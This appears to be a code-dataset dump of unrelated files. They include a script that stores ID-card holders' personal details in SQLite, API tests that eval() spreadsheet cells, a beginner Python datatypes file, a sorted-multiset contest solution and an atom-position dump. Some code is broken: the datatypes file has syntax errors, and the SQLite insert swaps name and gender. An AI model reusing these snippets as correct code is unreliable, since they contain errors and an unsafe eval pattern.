print(num, "is an odd number")
| [
"[email protected]"
] | |
96c733a9b746b27413f837bde6c7dce363b7961c | 168bc919d9f03749d01cb3089a358c2ea7a928ea | /Create_sql.py | 57de72cc90c0ae8420dc86f786431a3543a6230f | [] | no_license | tacha-chang/ce63-46 | 175294f6f7fd6584aec1d1285d73028f0b2ed02e | 8fc0551104f986dd9058bb2e968469b2f1325f82 | refs/heads/master | 2023-03-19T22:27:59.086034 | 2021-03-18T23:54:23 | 2021-03-18T23:54:23 | 296,383,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,942 | py | import sqlite3
import shutil
from Card_reading import reader_card
data = reader_card()
def create_user_officer(file_id): #move office
file_id = file_id
x = file_id[2]
# print(x[0])
print(x[1:18]) #ID_card
# 6 gender (7 8)name
#print('บ้านเลขที่ ' +x[14] +' ' + x[15]+' ' + x[16]+' ' + x[17]+' ' + x[18]+' ' + x[19]+' ' + x[20]+' ' + x[21]) #address
name_file = x[1:18]
Name_USER = file_id[7]+' '+file_id[8]
GENDER = file_id[6]
# address = x[14] +' ' + x[15]+' ' + x[16]+' ' + x[17]+' ' + x[18]+' ' + x[19]+' ' + x[20]+' ' + x[21]
address = file_id[15]
Office = "KMITL" #สมมุติ
file_name = name_file+'.db'
print(file_name)
conn = sqlite3.connect(file_name)
cursor = conn.cursor()
print("create database 0f " + file_name)
# conn.execute('''CREATE TABLE USER
# (ID INT PRIMARY KEY NOT NULL,
# GENDER TEXT NOT NULL,
# NAME TEXT NOT NULL,
# ADRESS TEXT NOT NULL,
# OFFICE TEXT NOT NULL);''')
sqlite_insert_with_param = """INSERT INTO USER
(ID, GENDER, NAME, ADRESS, OFFICE)
VALUES (?, ?, ?, ?, ?);"""
data_tuple = (name_file, Name_USER, GENDER, address, Office)
print("success created ")
# conn.execute("INSERT INTO USER VALUES (1, x[1],x[1],x[1],x[1])")
cursor.execute(sqlite_insert_with_param, data_tuple)
conn.commit()
conn.close()
# except sqlite3.Error as error:
# print("Failed to insert Python variable into sqlite table", error)
# finally:
# if conn:
# conn.close()
# print("The SQLite connection is closed")
create_user_officer(data)
| [
"[email protected]"
] | |
124d77348f3d3ea06d36c0de306ca45e624bbd99 | fb1e94f4b51ab342a81be7c38e7c09bf7d4a94fc | /apicode/Pytest0_case/test_07_article.py | d5dbef686fd1b50f7562cf54d137efc605990d1b | [] | no_license | HOHO-00/test_00 | cc1233b0809c171d51c2633fa7d886bea5a657d3 | 21fb066d0c1bac661af54e698e990beb3fbb1a2f | refs/heads/master | 2023-06-22T03:59:43.625128 | 2021-07-23T00:51:50 | 2021-07-23T00:51:50 | 292,587,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,867 | py | """
文章相关接口测试用例
"""
import pytest
import requests
import os, sys
sys.path.append(os.getcwd())
from utils.dbtools import query
from utils.filetools import read_file
from utils.filetools import write_file
from utils.exceltools import read_excel
datas = read_excel("data/data.xlsx", "文章")
# 获取文章详情
def test_01_arictle_details():
url = datas[0][2]
header = eval(datas[0][3])
res = requests.get(url=url,headers=header)
assert res.status_code == datas[0][5]
assert res.json()["status"] == datas[0][6]
# 获取文章评论列表
def test_02_arictle_comments():
url = datas[1][2]
header = eval(datas[1][3])
data = eval(datas[1][4])
res = requests.post(url=url,headers=header,json=data)
assert res.status_code == datas[1][5]
assert res.json()["status"] == datas[1][6]
# 新增文章
def test_03_article_add():
url = datas[2][2]
header = eval(datas[2][3])
data = eval(datas[2][4])
res = requests.post(url=url,headers=header,json=data)
# print(res.text)
assert res.status_code == datas[2][5]
assert res.json()["status"] == datas[2][6]
articleid = res.json()["data"]["articleid"]
write_file('./tmp/article_id.txt',str(articleid))
sql = "select * from t_article where id = {}".format(read_file("./tmp/article_id.txt"))
assert len(query(sql)) != 0
# 修改文章
def test_04_article_update():
url = datas[3][2]
"""
payload={}
files=[('upload',('ho.png',open('C:/users/jssy/Pictures/ho.png','rb'),'image/png'))]
"""
header = eval(datas[3][3])
data = eval(datas[3][4])
res = requests.post(url=url,headers=header,json=data) # res = requests.post(url=url, json=data, headers=header,data=payload)
# print(res.text)
assert res.status_code == datas[3][5]
assert res.json()["status"] == datas[3][6]
title = eval(datas[3][4])["title"]
# sql = "select * from t_article where id = {} and title = '{}'"
# sql = "select * from t_article where id = {} and title = '为什么要学习测试123'".format(read_file("./tmp/article_id.txt"))
sql = "select * from t_article where id = {} and title = '{}'".format(read_file("./tmp/article_id.txt"),title)
# r = query(sql)
# assert len(r) != 0
assert len(query(sql)) != 0
# 删除文章
def test_05_article_delete():
url = datas[4][2]
header = eval(datas[4][3])
data = eval(datas[4][4])
res = requests.post(url=url,headers=header,json=data)
# print(res.text)
assert res.status_code == datas[2][5]
assert res.json()["status"] == datas[2][6]
sql = "select * from t_article where id = {} and status = '1'".format(read_file("./tmp/article_id.txt")) # status:0正常;1删除;2禁用
assert len(query(sql)) != 0 | [
"[email protected]"
] | |
8edaa67fda3c2d8e1a359fba81e6985b7270aa14 | 8a48adfaca1854854c79b7fbe1e60c67931a2cfb | /Datatype.py | 5393aaceed7bf53887c91a4fc2175a2713bbcdff | [] | no_license | karolcajo/Tarea-5-Ejemplos | 14cb049a402ea572a30b94d916037741eb18e8df | 5b25a00fb4c9532ac1e0040b26e7bdd038f77703 | refs/heads/main | 2022-12-24T20:47:30.941510 | 2020-10-11T15:32:05 | 2020-10-11T15:32:05 | 302,953,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # String
print("Hello World")
print("Hello world")
print("""Hello World""")
print("Bye" + "World")
# Integer
print(30)
# Float
print(30.5)
# Boolean
True
False
# List
[10, 20, 30, 55]
["hello","bye","adios"]
[10, "hello", true, 10.1]
[]
# Tuples
(10, 20, 30, 55)
()
# Dictorionies
print(type({"nombredelapersona":"Ryan"
"apellido":"Ray"
"apodo":"Fazt"
}))
None | [
"[email protected]"
] | |
4be0a9347751505cc966aaaae4aa8a00df3626f7 | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /AtCoder_Virtual_Contest/macle_20220825/c/main.py | 02c948ca2212d942ef5f1445c169292d56933fb5 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 5,236 | py | # -*- coding: utf-8 -*-
import math
from bisect import bisect_left, bisect_right, insort
from typing import Generic, Iterable, Iterator, TypeVar, Union, List
T = TypeVar('T')
class SortedMultiset(Generic[T]):
"""Sorted multi set (set) in C++.
See:
https://qiita.com/tatyam/items/492c70ac4c955c055602
https://github.com/tatyam-prime/SortedSet/blob/main/SortedMultiset.py
"""
BUCKET_RATIO = 50
REBUILD_RATIO = 170
def _build(self, a=None) -> None:
"Evenly divide `a` into buckets."
if a is None:
a = list(self)
size = self.size = len(a)
bucket_size = int(math.ceil(math.sqrt(size / self.BUCKET_RATIO)))
self.a = [a[size * i // bucket_size: size * (i + 1) // bucket_size] for i in range(bucket_size)]
def __init__(self, a: Iterable[T] = []) -> None:
"Make a new SortedMultiset from iterable. / O(N) if sorted / O(N log N)"
a = list(a)
if not all(a[i] <= a[i + 1] for i in range(len(a) - 1)): # type: ignore
a = sorted(a) # type: ignore
self._build(a)
def __iter__(self) -> Iterator[T]:
for i in self.a:
for j in i:
yield j # type: ignore
def __reversed__(self) -> Iterator[T]:
for i in reversed(self.a):
for j in reversed(i):
yield j
def __len__(self) -> int:
return self.size
def __repr__(self) -> str:
return "SortedMultiset" + str(self.a)
def __str__(self) -> str:
s = str(list(self))
return "{" + s[1: len(s) - 1] + "}"
def _find_bucket(self, x: T) -> List[T]:
"Find the bucket which should contain x. self must not be empty."
for a in self.a:
if x <= a[-1]: # type: ignore
return a
return a # type: ignore
def __contains__(self, x: T) -> bool:
if self.size == 0:
return False
a = self._find_bucket(x)
i = bisect_left(a, x) # type: ignore
return i != len(a) and a[i] == x
def count(self, x: T) -> int:
"Count the number of x."
return self.index_right(x) - self.index(x)
def add(self, x: T) -> None:
"Add an element. / O(√N)"
if self.size == 0:
self.a = [[x]]
self.size = 1
return
a = self._find_bucket(x)
insort(a, x) # type: ignore
self.size += 1
if len(a) > len(self.a) * self.REBUILD_RATIO:
self._build()
def discard(self, x: T) -> bool:
"Remove an element and return True if removed. / O(√N)"
if self.size == 0:
return False
a = self._find_bucket(x)
i = bisect_left(a, x) # type: ignore
if i == len(a) or a[i] != x:
return False
a.pop(i)
self.size -= 1
if len(a) == 0:
self._build()
return True
def lt(self, x: T) -> Union[T, None]:
"Find the largest element < x, or None if it doesn't exist."
for a in reversed(self.a):
if a[0] < x: # type: ignore
return a[bisect_left(a, x) - 1] # type: ignore
return None
def le(self, x: T) -> Union[T, None]:
"Find the largest element <= x, or None if it doesn't exist."
for a in reversed(self.a):
if a[0] <= x: # type: ignore
return a[bisect_right(a, x) - 1] # type: ignore
return None
def gt(self, x: T) -> Union[T, None]:
"Find the smallest element > x, or None if it doesn't exist."
for a in self.a:
if a[-1] > x: # type: ignore
return a[bisect_right(a, x)] # type: ignore
return None
def ge(self, x: T) -> Union[T, None]:
"Find the smallest element >= x, or None if it doesn't exist."
for a in self.a:
if a[-1] >= x: # type: ignore
return a[bisect_left(a, x)] # type: ignore
return None
def __getitem__(self, x: int) -> T:
"Return the x-th element, or IndexError if it doesn't exist."
if x < 0:
x += self.size
if x < 0:
raise IndexError
for a in self.a:
if x < len(a):
return a[x] # type: ignore
x -= len(a)
raise IndexError
def index(self, x: T) -> int:
"Count the number of elements < x."
ans = 0
for a in self.a:
if a[-1] >= x: # type: ignore
return ans + bisect_left(a, x) # type: ignore
ans += len(a)
return ans
def index_right(self, x: T) -> int:
"Count the number of elements <= x."
ans = 0
for a in self.a:
if a[-1] > x: # type: ignore
return ans + bisect_right(a, x) # type: ignore
ans += len(a)
return ans
def main():
import sys
input = sys.stdin.readline
l, q = map(int, input().split())
s = SortedMultiset([0, l])
for i in range(q):
ci, xi = map(int, input().split())
if ci == 1:
s.add(xi)
else:
print(s.gt(xi) - s.lt(xi))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
74c3487b1ce6284d456f24c7a822e7f5b042c1b0 | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp83_0.py | 55e6471489d774a44032f55978e0c9af8a653f9c | [] | no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,894 | py | ITEM: TIMESTEP
0
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
3.3480991349454570e-01 4.6865190086497961e+01
3.3480991349454570e-01 4.6865190086497961e+01
3.3480991349454570e-01 4.6865190086497961e+01
ITEM: ATOMS id type xs ys zs
8 1 0.130808 0.0685954 0.067749
35 1 0.0615812 0.131941 0.0620756
130 1 0.0673745 0.0640743 0.11748
165 1 0.131142 0.128914 0.121465
2 1 0.0695213 0.0667569 0.00435885
37 1 0.125561 0.133088 0.00372516
1 1 0.00214951 0.00360363 0.00137352
129 1 0.00721661 0.000399364 0.132507
133 1 0.12787 0.0091779 0.125678
3 1 0.0615281 0.00283245 0.0560259
33 1 0.00628241 0.122947 0.00199967
41 1 0.255074 0.120998 0.00247506
12 1 0.256702 0.0621165 0.0635116
39 1 0.18849 0.128713 0.0601789
43 1 0.314491 0.133976 0.0600459
134 1 0.190575 0.0721728 0.127107
138 1 0.312259 0.0636323 0.128498
169 1 0.249922 0.133413 0.117835
7 1 0.186992 0.00728301 0.0645151
137 1 0.250507 0.00351034 0.121993
6 1 0.189619 0.0663561 0.00165912
16 1 0.369832 0.065535 0.0613228
47 1 0.437339 0.134886 0.0575771
142 1 0.43311 0.0693917 0.124919
173 1 0.374931 0.129585 0.123094
145 1 0.49597 0.00509139 0.121231
20 1 0.490534 0.060222 0.0599609
15 1 0.433715 0.00178399 0.059005
14 1 0.429334 0.0650988 0.00372852
49 1 0.494926 0.120136 0.000961326
177 1 0.500933 0.127737 0.120011
24 1 0.618947 0.0656048 0.0659352
51 1 0.564982 0.123398 0.0535858
146 1 0.556652 0.0696211 0.120498
181 1 0.623493 0.127887 0.119896
149 1 0.621413 0.00203271 0.126088
19 1 0.55821 0.00671903 0.065014
28 1 0.744291 0.051325 0.0639339
55 1 0.682399 0.124839 0.0582936
59 1 0.812581 0.119231 0.0638001
150 1 0.688481 0.0611819 0.121978
154 1 0.799091 0.0663457 0.132579
185 1 0.746599 0.127579 0.125456
22 1 0.67589 0.0536424 0.00674597
57 1 0.74755 0.118531 0.00724268
26 1 0.819197 0.0635787 0.00609031
4 1 0.996363 0.0584481 0.0633073
161 1 0.996703 0.121693 0.122247
32 1 0.878943 0.0628986 0.0636405
63 1 0.931276 0.130829 0.0663827
158 1 0.933467 0.0579956 0.122245
189 1 0.877272 0.121874 0.130926
61 1 0.867437 0.135243 0.00464827
30 1 0.938778 0.0567226 0.000580732
40 1 0.125694 0.194609 0.0654106
67 1 0.0543099 0.249068 0.0724686
72 1 0.12366 0.312019 0.0666992
162 1 0.0688229 0.188212 0.127454
194 1 0.0574666 0.306123 0.127401
197 1 0.121783 0.247949 0.123449
36 1 0.000173399 0.183002 0.069021
69 1 0.113044 0.250965 0.00828519
34 1 0.06401 0.190304 0.00124161
44 1 0.242643 0.193217 0.0630084
71 1 0.186982 0.25364 0.0596591
75 1 0.306053 0.243772 0.0614634
76 1 0.254313 0.303096 0.0699722
166 1 0.187876 0.188445 0.125002
170 1 0.316137 0.184086 0.123622
198 1 0.189632 0.311759 0.129538
201 1 0.253681 0.249862 0.130996
202 1 0.321845 0.320619 0.13367
74 1 0.313776 0.313242 0.0055655
73 1 0.248241 0.25639 0.000483841
48 1 0.383878 0.190133 0.0542299
79 1 0.44665 0.247464 0.0529615
80 1 0.372873 0.311057 0.0600798
174 1 0.435719 0.19442 0.120077
205 1 0.374042 0.248904 0.115022
206 1 0.444925 0.299641 0.11928
84 1 0.504138 0.308064 0.0623404
52 1 0.50307 0.182235 0.0613968
209 1 0.5133 0.251198 0.12277
56 1 0.622931 0.183591 0.0613469
83 1 0.561503 0.242679 0.0566626
88 1 0.618381 0.316386 0.0585294
178 1 0.566574 0.184471 0.121372
210 1 0.568165 0.312496 0.125149
213 1 0.626406 0.250788 0.121887
60 1 0.748808 0.183019 0.0567971
87 1 0.685999 0.253104 0.0553365
91 1 0.804547 0.247052 0.0560679
92 1 0.747832 0.318432 0.0616899
182 1 0.69039 0.185775 0.117104
186 1 0.808283 0.182532 0.119399
214 1 0.68067 0.313849 0.121539
217 1 0.746881 0.247696 0.114411
218 1 0.811768 0.314322 0.114754
54 1 0.685855 0.18377 0.00494905
58 1 0.802232 0.184376 0.00288401
62 1 0.9406 0.191793 0.006952
93 1 0.873021 0.243789 0.00528555
193 1 0.999166 0.243232 0.135248
68 1 0.999754 0.30919 0.0644451
64 1 0.870868 0.18797 0.0687111
95 1 0.94118 0.253044 0.0627872
96 1 0.871386 0.31454 0.0528561
190 1 0.941147 0.187395 0.126725
221 1 0.881809 0.247341 0.122331
222 1 0.938404 0.310315 0.132704
94 1 0.94391 0.313816 0.00201044
1153 1 0.000742689 0.497468 0.119691
1027 1 0.0628977 0.491051 0.0670263
101 1 0.130759 0.379155 0.00167892
99 1 0.0673753 0.3724 0.0642353
104 1 0.132739 0.432169 0.06254
226 1 0.0654797 0.435363 0.125966
229 1 0.128378 0.36903 0.125893
1157 1 0.124968 0.497623 0.116302
97 1 1.37735e-05 0.371807 0.00414642
105 1 0.256089 0.371076 0.0117414
103 1 0.190901 0.369792 0.062353
107 1 0.317192 0.372 0.0646675
108 1 0.256967 0.440648 0.0749559
230 1 0.184297 0.431328 0.134146
233 1 0.254244 0.363377 0.125442
234 1 0.316812 0.442074 0.127498
1031 1 0.189927 0.497284 0.0727541
102 1 0.198861 0.437305 0.0100326
106 1 0.305361 0.444269 0.00570288
1169 1 0.495688 0.49476 0.129357
111 1 0.439739 0.370403 0.0596494
112 1 0.382055 0.432033 0.0645835
237 1 0.390137 0.373927 0.124025
238 1 0.445138 0.432259 0.129537
1165 1 0.381304 0.491683 0.12932
1039 1 0.438648 0.493656 0.0706543
116 1 0.503189 0.436567 0.0606158
241 1 0.500144 0.368258 0.121423
115 1 0.559084 0.376872 0.0574744
120 1 0.625103 0.441154 0.0575074
242 1 0.559678 0.442361 0.121917
245 1 0.623913 0.381813 0.116352
1043 1 0.559189 0.499218 0.0563459
117 1 0.622536 0.372631 7.60526e-05
113 1 0.503824 0.366053 0.00101907
114 1 0.556925 0.43937 0.000178973
119 1 0.690029 0.376238 0.0609137
123 1 0.815313 0.378998 0.0616236
124 1 0.759391 0.439723 0.0560861
246 1 0.685807 0.436367 0.126553
249 1 0.750717 0.380718 0.121318
250 1 0.819825 0.435973 0.123049
1047 1 0.694157 0.498194 0.057227
1177 1 0.753685 0.496646 0.118017
126 1 0.93435 0.439977 0.00627683
1053 1 0.882555 0.499621 0.00115897
225 1 0.996166 0.3724 0.125924
100 1 0.997643 0.433141 0.0620464
127 1 0.935941 0.368689 0.0662383
128 1 0.876206 0.441698 0.0601959
253 1 0.873727 0.365926 0.121554
254 1 0.935601 0.434055 0.120289
1055 1 0.939368 0.497967 0.0678297
1181 1 0.878863 0.499827 0.126726
259 1 0.0565572 0.000414809 0.308376
136 1 0.129436 0.064618 0.182635
163 1 0.0640827 0.123877 0.184253
258 1 0.0662541 0.0596461 0.251425
264 1 0.127049 0.0570362 0.306392
291 1 0.0732193 0.116105 0.319356
293 1 0.129167 0.123144 0.2474
289 1 0.00204297 0.125387 0.256579
131 1 0.0711838 0.000999719 0.194282
139 1 0.317293 0.000885977 0.18865
140 1 0.256016 0.055746 0.185537
167 1 0.190176 0.133277 0.185186
171 1 0.309518 0.125062 0.183755
262 1 0.187576 0.0652493 0.240892
266 1 0.317563 0.0575759 0.246528
268 1 0.249912 0.0540318 0.300983
295 1 0.187193 0.125175 0.315931
297 1 0.248099 0.116348 0.244811
299 1 0.310135 0.122105 0.308364
267 1 0.316216 0.00456555 0.306209
273 1 0.499105 0.00997211 0.246188
269 1 0.384073 0.000217788 0.247436
144 1 0.37568 0.0707162 0.182797
175 1 0.438743 0.133769 0.181454
270 1 0.436509 0.0691415 0.235673
272 1 0.380344 0.0652718 0.314133
301 1 0.373224 0.129184 0.243789
303 1 0.437185 0.120059 0.316603
305 1 0.495062 0.122584 0.250722
148 1 0.493762 0.0703723 0.182514
147 1 0.555132 0.00229531 0.185603
276 1 0.503994 0.0584305 0.313844
152 1 0.625503 0.0712222 0.182925
179 1 0.564569 0.123968 0.184759
274 1 0.569237 0.0610354 0.247504
280 1 0.629743 0.0629336 0.309739
307 1 0.56563 0.129756 0.306172
309 1 0.62913 0.123242 0.25323
281 1 0.747218 0.00396904 0.250125
155 1 0.813087 0.00253837 0.196412
283 1 0.812299 0.0109066 0.31619
156 1 0.74391 0.0670888 0.190519
183 1 0.684164 0.126009 0.180956
187 1 0.807814 0.126769 0.189073
278 1 0.690184 0.0685558 0.257577
282 1 0.809024 0.0675577 0.252296
284 1 0.750274 0.0698333 0.3201
311 1 0.685946 0.131985 0.312882
313 1 0.740982 0.135896 0.252441
315 1 0.80625 0.128088 0.31386
151 1 0.682924 0.000817487 0.185213
279 1 0.689308 0.00113855 0.31504
285 1 0.872135 0.000415968 0.257827
132 1 0.999423 0.065671 0.197055
159 1 0.934174 0.00318601 0.188882
260 1 0.997122 0.0699007 0.320016
160 1 0.876468 0.0687117 0.192343
191 1 0.936258 0.131905 0.189741
286 1 0.930376 0.0588509 0.253288
288 1 0.870897 0.0705589 0.314562
317 1 0.875712 0.127353 0.244116
319 1 0.930524 0.129582 0.315306
287 1 0.940206 0.00301296 0.315358
257 1 0.996595 0.00350416 0.250593
168 1 0.127209 0.191558 0.189696
195 1 0.0660123 0.251225 0.196061
200 1 0.125058 0.309582 0.187085
290 1 0.0712299 0.184039 0.258893
296 1 0.127664 0.183216 0.314672
322 1 0.0667037 0.312513 0.256821
323 1 0.0642226 0.250456 0.311865
325 1 0.130138 0.250571 0.257949
328 1 0.119002 0.314136 0.320616
321 1 0.000721527 0.241674 0.253799
172 1 0.251115 0.18914 0.185656
199 1 0.19344 0.247326 0.189114
203 1 0.31503 0.255798 0.181041
204 1 0.249209 0.309581 0.191835
294 1 0.190447 0.177052 0.254652
298 1 0.302164 0.175845 0.252911
300 1 0.248631 0.186913 0.321318
326 1 0.183707 0.313727 0.250178
327 1 0.188983 0.246045 0.312051
329 1 0.249613 0.251089 0.251748
330 1 0.313827 0.317204 0.247669
331 1 0.311272 0.248405 0.308032
332 1 0.243707 0.309753 0.311956
176 1 0.371865 0.192375 0.187245
207 1 0.438288 0.255202 0.19267
208 1 0.37923 0.317742 0.189826
302 1 0.431498 0.186668 0.245193
304 1 0.378788 0.180091 0.312252
333 1 0.370331 0.250343 0.248901
334 1 0.447412 0.311098 0.252938
335 1 0.436785 0.247291 0.30907
336 1 0.378604 0.313373 0.311762
308 1 0.493547 0.183053 0.307382
340 1 0.499381 0.309883 0.316631
212 1 0.505823 0.302948 0.18548
180 1 0.503677 0.188953 0.180575
337 1 0.507168 0.247042 0.249991
184 1 0.633089 0.196016 0.187141
211 1 0.569013 0.248835 0.186554
216 1 0.631089 0.312309 0.184568
306 1 0.558406 0.184284 0.243431
312 1 0.623391 0.19324 0.311526
338 1 0.562591 0.314372 0.260251
339 1 0.562076 0.243118 0.318261
341 1 0.623631 0.256272 0.25304
344 1 0.627891 0.29938 0.323897
188 1 0.745594 0.188846 0.179614
215 1 0.703908 0.259117 0.187684
219 1 0.81558 0.253431 0.179238
220 1 0.764444 0.316499 0.190309
310 1 0.684419 0.195572 0.247556
314 1 0.815778 0.188495 0.250109
316 1 0.748454 0.194287 0.318858
342 1 0.692404 0.314329 0.252913
343 1 0.689102 0.252227 0.309533
345 1 0.760707 0.249191 0.24599
346 1 0.813306 0.324464 0.262143
347 1 0.801085 0.257967 0.31788
348 1 0.743556 0.315792 0.315912
196 1 0.999119 0.306968 0.194388
292 1 0.993512 0.181872 0.32329
164 1 0.998136 0.182228 0.193998
324 1 0.994198 0.31042 0.312565
192 1 0.863492 0.187834 0.183061
223 1 0.931013 0.242174 0.191254
224 1 0.87258 0.312959 0.186686
318 1 0.934218 0.191 0.2583
320 1 0.868164 0.193348 0.310307
349 1 0.862555 0.25335 0.247697
350 1 0.929198 0.310755 0.250597
351 1 0.934351 0.253789 0.313127
352 1 0.869143 0.314194 0.3249
227 1 0.0641682 0.376947 0.19514
232 1 0.121093 0.441191 0.189849
354 1 0.0649897 0.43891 0.249511
355 1 0.0670658 0.376731 0.319004
357 1 0.11907 0.376049 0.250163
360 1 0.125581 0.436376 0.321527
228 1 0.000452675 0.439151 0.183139
356 1 0.00718559 0.434872 0.314016
1285 1 0.126234 0.498334 0.252558
1163 1 0.311303 0.492584 0.19305
231 1 0.184628 0.370412 0.193416
235 1 0.303967 0.383904 0.189288
236 1 0.245148 0.445977 0.192844
358 1 0.186834 0.430916 0.256134
359 1 0.186173 0.373662 0.320578
361 1 0.244455 0.372797 0.255943
362 1 0.315268 0.43998 0.259447
363 1 0.313867 0.373648 0.314304
364 1 0.242189 0.42989 0.317176
1287 1 0.193393 0.498441 0.307844
1289 1 0.248281 0.49779 0.251756
1167 1 0.438262 0.493268 0.191139
239 1 0.4461 0.369281 0.191217
240 1 0.380109 0.430089 0.18568
365 1 0.372631 0.376715 0.254974
366 1 0.43981 0.438263 0.249753
367 1 0.439216 0.376651 0.308024
368 1 0.375136 0.435768 0.315129
244 1 0.499482 0.432883 0.19302
1295 1 0.438602 0.49781 0.302718
372 1 0.502235 0.440118 0.312916
369 1 0.506102 0.376853 0.257459
243 1 0.566916 0.3698 0.190502
248 1 0.625246 0.442098 0.18351
370 1 0.566183 0.440842 0.248823
371 1 0.570289 0.383304 0.315865
373 1 0.63593 0.372603 0.25175
376 1 0.629336 0.443156 0.312789
1171 1 0.562188 0.496071 0.186107
1305 1 0.75248 0.498055 0.251257
247 1 0.698181 0.368625 0.180705
251 1 0.81892 0.372814 0.186165
252 1 0.752613 0.438241 0.176517
374 1 0.684833 0.435744 0.232467
375 1 0.68918 0.371733 0.312853
377 1 0.748556 0.383661 0.2448
378 1 0.812586 0.43996 0.240946
379 1 0.807743 0.384511 0.318592
380 1 0.74848 0.441809 0.307478
1175 1 0.693097 0.498991 0.180175
1179 1 0.814064 0.498886 0.178295
1307 1 0.815758 0.495645 0.314288
1303 1 0.691868 0.498188 0.307526
1183 1 0.939527 0.499632 0.177487
1311 1 0.930977 0.496889 0.313792
353 1 0.993963 0.373152 0.246172
255 1 0.929462 0.375471 0.18908
256 1 0.878582 0.441149 0.187155
381 1 0.877812 0.375232 0.250494
382 1 0.940345 0.441483 0.247686
383 1 0.937163 0.381519 0.316678
384 1 0.877079 0.437654 0.309054
386 1 0.0671931 0.0560101 0.378639
392 1 0.139051 0.0511576 0.434894
419 1 0.0695381 0.118189 0.443757
421 1 0.129883 0.119813 0.377369
417 1 0.00906949 0.117649 0.380875
388 1 0.00158545 0.0617551 0.443217
518 1 0.195112 0.0541287 0.495823
390 1 0.186618 0.0585888 0.370251
394 1 0.317515 0.0620401 0.363414
396 1 0.251887 0.0595268 0.437592
423 1 0.190646 0.118318 0.434899
425 1 0.250026 0.113863 0.372133
427 1 0.308295 0.117554 0.438646
395 1 0.318794 0.00149328 0.434646
398 1 0.442448 0.060856 0.373163
400 1 0.385455 0.0581187 0.432899
429 1 0.368808 0.120165 0.373746
431 1 0.432768 0.130943 0.437007
525 1 0.382653 0.000477807 0.488197
403 1 0.559799 0.00729634 0.438625
405 1 0.624702 0.00834647 0.370963
404 1 0.501251 0.0755657 0.437406
433 1 0.501471 0.12243 0.372744
402 1 0.562954 0.0681385 0.378609
408 1 0.624553 0.0661749 0.43386
435 1 0.568164 0.125738 0.439739
437 1 0.628638 0.117937 0.376083
401 1 0.504656 0.00313212 0.370533
565 1 0.633412 0.122192 0.496744
529 1 0.500518 0.00631837 0.499628
533 1 0.628427 0.00274921 0.499927
409 1 0.75091 0.00172483 0.375486
406 1 0.691995 0.0642952 0.378951
410 1 0.8104 0.0713467 0.375642
412 1 0.748857 0.0616365 0.440691
439 1 0.689425 0.129481 0.440864
441 1 0.7507 0.132929 0.379265
443 1 0.810692 0.129719 0.443751
569 1 0.749629 0.135791 0.492733
415 1 0.938783 0.00664016 0.436108
414 1 0.93898 0.0619269 0.37646
416 1 0.87034 0.0612477 0.432591
445 1 0.870868 0.129988 0.376086
447 1 0.937757 0.121259 0.436445
573 1 0.880569 0.121708 0.495782
418 1 0.0678268 0.185727 0.377017
424 1 0.133697 0.182642 0.442668
450 1 0.0612166 0.316289 0.386841
451 1 0.0629657 0.244691 0.447917
453 1 0.122826 0.249759 0.376897
456 1 0.126958 0.30679 0.441484
578 1 0.0617769 0.314399 0.499922
585 1 0.24715 0.25447 0.495774
422 1 0.185527 0.175578 0.376049
426 1 0.307385 0.177534 0.367406
428 1 0.246243 0.186573 0.437882
454 1 0.181544 0.305131 0.375893
455 1 0.186571 0.250063 0.438609
457 1 0.241276 0.244043 0.374309
458 1 0.319711 0.308124 0.374438
459 1 0.315047 0.252458 0.435654
460 1 0.246682 0.308974 0.434999
554 1 0.309818 0.184274 0.493833
586 1 0.308402 0.309881 0.493538
590 1 0.440778 0.303222 0.491464
430 1 0.434555 0.182258 0.375137
432 1 0.368079 0.17678 0.434922
461 1 0.372862 0.242914 0.372612
462 1 0.434146 0.302745 0.374125
463 1 0.43704 0.24154 0.435763
464 1 0.377722 0.311453 0.431851
468 1 0.497617 0.309256 0.428502
558 1 0.432604 0.188541 0.494337
436 1 0.505639 0.176088 0.44679
465 1 0.500957 0.243346 0.376107
467 1 0.565361 0.244054 0.448013
434 1 0.569407 0.184443 0.382102
469 1 0.627587 0.246635 0.383947
472 1 0.621607 0.313744 0.444152
466 1 0.567878 0.309661 0.377673
440 1 0.624173 0.19177 0.44737
594 1 0.563425 0.311455 0.496941
473 1 0.746324 0.255658 0.381248
475 1 0.806953 0.258056 0.449302
470 1 0.688583 0.318958 0.382257
442 1 0.808859 0.186448 0.379792
438 1 0.684901 0.192229 0.378514
476 1 0.753549 0.311547 0.442639
471 1 0.687759 0.256555 0.439059
444 1 0.754227 0.201552 0.442306
474 1 0.804879 0.315776 0.377931
449 1 0.993778 0.250126 0.381954
420 1 0.993694 0.185156 0.442256
452 1 0.994702 0.317014 0.439571
446 1 0.928157 0.197524 0.373125
448 1 0.877711 0.1887 0.432458
478 1 0.931088 0.315133 0.377649
480 1 0.874909 0.315179 0.446565
477 1 0.867167 0.253173 0.381455
479 1 0.933798 0.253872 0.439222
574 1 0.935019 0.1899 0.496134
613 1 0.126726 0.379082 0.495474
482 1 0.0603128 0.443197 0.375878
483 1 0.0626419 0.381061 0.442962
488 1 0.116745 0.445854 0.435294
485 1 0.121161 0.374819 0.379627
489 1 0.25395 0.380146 0.382088
486 1 0.187077 0.434374 0.379135
491 1 0.318201 0.371148 0.426344
490 1 0.311875 0.437118 0.367354
492 1 0.254021 0.444172 0.430995
1419 1 0.318808 0.498721 0.430363
617 1 0.254469 0.382272 0.488775
